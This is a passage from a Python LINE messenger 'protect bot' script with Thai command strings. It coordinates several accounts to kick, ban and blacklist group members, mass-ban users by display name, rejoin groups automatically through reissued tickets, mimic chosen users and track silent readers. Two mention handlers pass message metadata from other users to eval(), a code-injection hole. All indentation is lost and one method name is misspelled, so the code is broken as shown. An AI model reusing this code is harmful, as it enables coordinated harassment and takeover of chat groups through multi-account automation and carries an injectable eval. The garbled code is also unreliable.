line.sendMessage(msg.to,"เปิดป้องกันเชิญกลุ่ม")
if RfuProtect["cancelprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญกลุ่ม")
else:
RfuProtect["cancelprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญกลุ่ม")
if RfuProtect["protect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันยกเลิกเชิญกลุ่ม")
else:
RfuProtect["protect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันเตะสมาชิกคนในกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันเตะสมาชิกคนในกลุ่ม")
if RfuProtect["linkprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม")
else:
RfuProtect["linkprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันลิ้งกลุ่ม")
if RfuProtect["Protectguest"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันกลุ่ม")
else:
RfuProtect["Protectguest"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันกลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันกลุ่ม")
if RfuProtect["Protectjoin"] == True:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันบุคคลภายน้อกเข้ากลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันบุคคลภายน้อกเข้ากลุ่ม")
else:
RfuProtect["Protectjoin"] = True
if settings["lang"] == "JP":
line.sendMessage(msg.to,"เปิดป้องกันบุคคลภายน้อกเข้ากลุ่ม")
else:
line.sendMessage(msg.to,"เปิดป้องกันบุคคลภายน้อกเข้ากลุ่ม")
elif msg.text.lower() == 'ปิดหมด':
if RfuProtect["inviteprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันทั้งหมดเรียบร้อยแล้ว")
else:
line.sendMessage(msg.to,"ปิดป้องกันทั้งหมดเรียบร้อยแล้ว")
else:
RfuProtect["inviteprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเชิญสมาชิกกลุ่ม")
if RfuProtect["cancelprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันยกเชิญสมาชิกกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันยกเชิญสมาชิกกลุ่ม")
else:
RfuProtect["cancelprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันยกเชิญสมาชิกกลุ่ม")
if RfuProtect["protect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเตะสมาชิกกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันเตะสมาชิกกลุ่ม")
else:
RfuProtect["protect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเตะสมาชิกกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันเตะสมาชิกกลุ่ม")
if RfuProtect["linkprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเปิดลิ้งกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันเปิดลิ้งกลุ่ม")
else:
RfuProtect["linkprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันเปิดลิ้งกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันเปิดลิ้งกลุ่ม")
if RfuProtect["Protectguest"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันกลุ่ม")
else:
RfuProtect["Protectguest"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันกลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันกลุ่ม")
if RfuProtect["Protectjoin"] == False:
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม")
else:
RfuProtect["Protectjoin"] = False
if settings["lang"] == "JP":
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม")
else:
line.sendMessage(msg.to,"ปิดป้องกันคนเข้ากลุ่ม")
#==============FINNISHING PROTECT========================#
elif msg.text.lower() == 'เปิดคนเข้า':
if settings["Sd"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"เปิดข้อความต้อนรับคนเข้ากลุ่ม")
else:
settings["Sd"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"เปิดข้อความต้อนรับคนเข้ากลุ่ม")
elif msg.text.lower() == 'ปิดคนเข้า':
if settings["Sd"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"ปิดข้อความต้อนรับคนเข้ากลุ่ม")
else:
settings["Sd"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"ปิดข้อความต้อนรับคนเข้ากลุ่ม")
elif msg.text.lower() == 'เปิดคนออก':
if settings["Nn"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"เปิดข้อความคนออก")
else:
settings["Nn"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"เปิดข้อความคนออก")
elif msg.text.lower() == 'ปิดคนออก':
if settings["Nn"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"ปิดข้อความคนออก")
else:
settings["Nn"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"ปิดข้อความคนออก")
elif text.lower() == '1ลบรัน':
gid = line.getGroupIdsInvited()
start = time.time()
for i in gid:
line.rejectGroupInvitation(i)
elapsed_time = time.time() - start
line.sendMessage(to, "ลบรันเสร็จแล้วขอรับ")
line.sendMessage(to, "ระยะเวลาที่ใช้: %sวินาที" % (elapsed_time))
elif "Allban" in msg.text:
if msg._from in Family:
if msg.toType == 2:
print ("All Banlist")
_name = msg.text.replace("Allban","")
gs = line.getGroup(msg.to)
line.sendMessage(msg.to,"Banned all")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
line.sendMessage(msg.to,"Maaf")
else:
for target in targets:
if not target in Family:
try:
settings["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
line.sentMessage(msg.to,"สมาชิกทั้งหมดได้รับการเพิ่มแบนแล้ว")
elif 'ban' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
settings["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
line.sendMessage(msg.to,"เพิ่มขึ้นสำหรับบัญชีดำ ")
print ("Banned User")
except:
line.sendMessage(msg.to,"ไม่พบ")
elif 'unban' in text.lower():
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del settings["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
line.sendMessage(msg.to,"ยกเลิกบัญชีจากบัญชีดำ")
print ("Unbanned User")
except:
line.sendMessage(msg.to,"ไม่พบ")
elif msg.text in ["เช็คดำ"]:
if msg._from in Family:
if settings["blacklist"] == {}:
line.sendMessage(msg.to,"ไม่พบ")
else:
line.sendMessage(msg.to,"รายชื่อผู้ติดดำ")
mc = "Blacklist User\n"
for mi_d in settings["blacklist"]:
mc += "➢ " + line.getContact(mi_d).displayName + " \n"
line.sendMessage(msg.to, mc + "")
elif msg.text.lower().startswith("urban "):
sep = msg.text.split(" ")
judul = msg.text.replace(sep[0] + " ","")
url = "http://api.urbandictionary.com/v0/define?term="+str(judul)
with requests.session() as s:
s.headers["User-Agent"] = random.choice(settings["userAgent"])
r = s.get(url)
data = r.text
data = json.loads(data)
y = "[ Result Urban ]"
y += "\nTags: "+ data["tags"][0]
y += ","+ data["tags"][1]
y += ","+ data["tags"][2]
y += ","+ data["tags"][3]
y += ","+ data["tags"][4]
y += ","+ data["tags"][5]
y += ","+ data["tags"][6]
y += ","+ data["tags"][7]
y += "\n[1]\nAuthor: "+str(data["list"][0]["author"])
y += "\nWord: "+str(data["list"][0]["word"])
y += "\nLink: "+str(data["list"][0]["permalink"])
y += "\nDefinition: "+str(data["list"][0]["definition"])
y += "\nExample: "+str(data["list"][0]["example"])
line.sendMessage(to, str(y))
elif msg.contentType == 7:
if settings["checkSticker"] == True:
stk_id = msg.contentMetadata['STKID']
stk_ver = msg.contentMetadata['STKVER']
pkg_id = msg.contentMetadata['STKPKGID']
ret_ = " ⚔️ Š€£Բ ฿✪Ŧ β¥.Šαї ⚔️"
ret_ += "\nSTICKER ID : {}".format(stk_id)
ret_ += "\nSTICKER PACKAGES ID : {}".format(pkg_id)
ret_ += "\nSTICKER VERSION : {}".format(stk_ver)
ret_ += "\nSTICKER URL : line://shop/detail/{}".format(pkg_id)
ret_ += "\n Ŧ€Āʍ ĦĀ¢₭€Ɖ ĊΦƉ€"
line.sendMessage(to, str(ret_))
#==============================================================================#
if op.type == 19:
if op.param2 in Family:
pass
if op.param2 in RfuBot:
pass
else:
if op.param3 in lineMID:
if op.param2 not in Family:
try:
G = ki.getGroup(op.param1)
G = kk.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kk.updateGroup(G)
ticket = kk.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
line.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(Rfu).getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
random.choice(Rfu).updateGroup(G)
ticket = random.choice(Rfu).reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
random.choice(Rfu).updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in kiMID:
if op.param2 not in Family:
try:
G = kk.getGroup(op.param1)
G = kc.getGroup(op.param1)
kk.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kc.updateGroup(G)
ticket = kc.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
kk.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(Rfu).getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kk.updateGroup(G)
ticket = random.choice(Rfu).reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
ki.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in kkMID:
if op.param2 not in Family:
try:
G = kc.getGroup(op.param1)
G = ki.getGroup(op.param1)
kc.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kc.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
kk.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(Rfu).getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
random.choice(Rfu).updateGroup(G)
ticket = random.choice(Rfu).reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
random.choice(Rfu).updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in kcMID:
if op.param2 not in Family:
try:
G = kk.getGroup(op.param1)
G = ke.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
kc.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(Rfu).getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
random.choice(Rfu).updateGroup(G)
ticket = random.choice(Rfu).reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
random.choice(Rfu).updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in keMID:
if op.param2 not in Family:
try:
G = ki.getGroup(op.param1)
G = kc.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
ke.updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(Rfu).getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
random.choice(Rfu).updateGroup(G)
ticket = random.choice(Rfu).reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.01)
G.preventedJoinByTicket = True
random.choice(Rfu).updateGroup(G)
settings["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(settings["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.type == 19:
if lineMID in op.param3:
settings["blacklist"][op.param2] = True
if op.type == 22:
if settings['leaveRoom'] == True:
line.leaveRoom(op.param1)
ki.leaveRoom(op.param1)
kk.leaveRoom(op.param1)
kc.leaveRoom(op.param1)
ke.leaveRoom(op.param1)
if op.type == 24:
if settings['leaveRoom'] == True:
line.leaveRoom(op.param1)
ki.leaveRoom(op.param1)
kk.leaveRoom(op.param1)
kc.leaveRoom(op.param1)
ke.leaveRoom(op.param1)
#==============================================================================#
if op.type == 19:
try:
if op.param3 in lineMID:
if op.param2 in kiMID:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
line.updateGroup(G)
else:
G = ki.getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
ki.updateGroup(G)
settings["blacklist"][op.param2] = True
elif op.param3 in kiMID:
if op.param2 in lineMID:
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = False
kk.updateGroup(G)
ticket = kk.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
kk.updateGroup(G)
else:
G = kk.getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kk.updateGroup(G)
ticket = kk.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
ki.updateGroup(G)
settings["blacklist"][op.param2] = True
elif op.param3 in kkMID:
if op.param2 in kiMID:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
ki.updateGroup(G)
ticket = ki.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
ki.updateGroup(G)
settings["blacklist"][op.param2] = True
elif op.param3 in kcMID:
if op.param2 in kkMID:
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = False
kk.updateGroup(G)
ticket = kk.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
kk.updateGroup(G)
else:
G = kk.getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
kk.updateGroup(G)
ticket = kk.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
kc.updateGroup(G)
settings["blacklist"][op.param2] = True
elif op.param3 in keMID:
if op.param2 in kcMID:
G = ke.getGroup(op.param1)
G.preventedJoinByTicket = False
ke.updateGroup(G)
ticket = ke.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
kc.updateGroup(G)
else:
G = ke.getGroup(op.param1)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
G.preventedJoinByTicket = False
ke.updateGroup(G)
ticket = ke.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
line.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ki.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
ke.acceptGroupInvitationByTicket(op.param1,format(str(ticket)))
time.sleep(0.0001)
G.preventedJoinByTicket = True
ke.updateGroup(G)
settings["blacklist"][op.param2] = True
except:
pass
#==============================================================================#
if op.type == 17:
if op.param2 not in Family:
if op.param2 in Family:
pass
if RfuProtect["protect"] == True:
if settings["blacklist"][op.param2] == True:
try:
line.kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
line.updateGroup(G)
except:
try:
line.kickoutFromGroup(op.param1,[op.param2])
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
line.updateGroup(G)
except:
pass
if op.type == 19:
if op.param2 not in Family:
if op.param2 in Family:
pass
elif RfuProtect["protect"] == True:
settings ["blacklist"][op.param2] = True
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
random.choice(Rfu).inviteIntoGroup(op.param1,[op.param2])
if op.type == 13:
if op.param2 not in Family:
if op.param2 in Family:
pass
elif RfuProtect["inviteprotect"] == True:
settings ["blacklist"][op.param2] = True
random.choice(Rfu).cancelGroupInvitation(op.param1,[op.param3])
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in Family:
if op.param2 in Family:
pass
elif RfuProtect["inviteprotect"] == True:
settings ["blacklist"][op.param2] = True
random.choice(Rfu).cancelGroupInvitation(op.param1,[op.param3])
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
if op.param2 not in Family:
if op.param2 in Family:
pass
elif RfuProtect["cancelprotect"] == True:
settings ["blacklist"][op.param2] = True
random.choice(Rfu).cancelGroupInvitation(op.param1,[op.param3])
if op.type == 11:
if op.param2 not in Family:
if op.param2 in Family:
pass
elif RfuProtect["linkprotect"] == True:
settings ["blacklist"][op.param2] = True
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
line.updateGroup(G)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
if op.type == 5:
if RfuProtect["autoAdd"] == True:
if (settings["message"] in [""," ","\n",None]):
pass
else:
line.sendMessage(op.param1,str(settings["message"]))
if op.type == 11:
if RfuProtect["linkprotect"] == True:
if op.param2 not in Family:
G = line.getGroup(op.param1)
G.preventedJoinByTicket = True
random.choice(Rfu).updateGroup(G)
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param3])
if op.type == 13:
if RfuProtect["Protectguest"] == True:
if op.param2 not in Family:
random.choice(Rfu).cancelGroupInvitation(op.param1,[op.param3])
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
if op.type == 17:
if RfuProtect["Protectjoin"] == True:
if op.param2 not in Family:
random.choice(Rfu).kickoutFromGroup(op.param1,[op.param2])
if op.type == 1:
if sender in Setmain["foto"]:
path = line.downloadObjectMsg(msg_id)
del Setmain["foto"][sender]
line.updateProfilePicture(path)
line.sendMessage(to,"เปลี่ยนรูปภาพเรียบร้อยแล้ว")
if op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != line.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if settings["autoRead"] == True:
line.sendChatChecked(to, msg_id)
ki.sendChatChecked(to, msg_id)
kk.sendChatChecked(to, msg_id)
kc.sendChatChecked(to, msg_id)
ke.sendChatChecked(to, msg_id)
if to in read["readPoint"]:
if sender not in read["ROM"][to]:
read["ROM"][to][sender] = True
if sender in settings["mimic"]["target"] and settings["mimic"]["status"] == True and settings["mimic"]["target"][sender] == True:
text = msg.text
if text is not None:
line.sendMessage(msg.to,text)
if msg.contentType == 0 and sender not in lineMID and msg.toType == 2:
if "MENTION" in list(msg.contentMetadata.keys()) != None:
if settings['detectMention'] == True:
contact = line.getContact(msg._from)
cName = contact.displayName
balas = ["\n " + cName ]
ret_ = "" + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in lineMID:
line.sendMessage(to,ret_)
line.sendMessage(to,str(settings["Respontag"]))
#sendMessageWithMention(to, contact.mid)
line.sendMessage(msg.to, None, contentMetadata={"STKID":"405","STKPKGID":"1","STKVER":"100"}, contentType=7)
break
if op.type == 17:
print ("MEMBER JOIN TO GROUP")
if settings["Sd"] == True:
if op.param2 in lineMID:
return
ginfo = line.getGroup(op.param1)
contact = line.getContact(op.param2)
image = "http://dl.profile.line.naver.jp/" + contact.pictureStatus
line.sendMessage(op.param1,str(settings["welcome"]))
line.sendImageWithURL(op.param1,image)
if op.type == 15:
print ("MEMBER LEAVE TO GROUP")
if settings["Nn"] == True:
if op.param2 in lineMID:
return
ginfo = line.getGroup(op.param1)
contact = line.getContact(op.param2)
image = "http://dl.profile.line.naver.jp/" + contact.pictureStatus
line.sendImageWithURL(op.param1,image)
line.sendMessage(op.param1,str(settings["bye"]) + "\n\n" + line.getContact(op.param2).displayName)
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 55:
try:
if RfuCctv['cyduk'][op.param1]==True:
if op.param1 in RfuCctv['point']:
Name = line.getContact(op.param2).displayName
if Name in RfuCctv['sidermem'][op.param1]:
pass
else:
RfuCctv['sidermem'][op.param1] += "\n" + Name
pref=['แอบอ่านทำไม ทำไมมะออกมาคุยกันละ ']
line.sendMessage(op.param1, str(random.choice(pref))+' '+Name)
else:
pass
else:
pass
except:
pass
if op.type == 55:
try:
if RfuCctv['cyduk'][op.param1]==True:
if op.param1 in RfuCctv['point']:
Name = line.getContact(op.param2).displayName
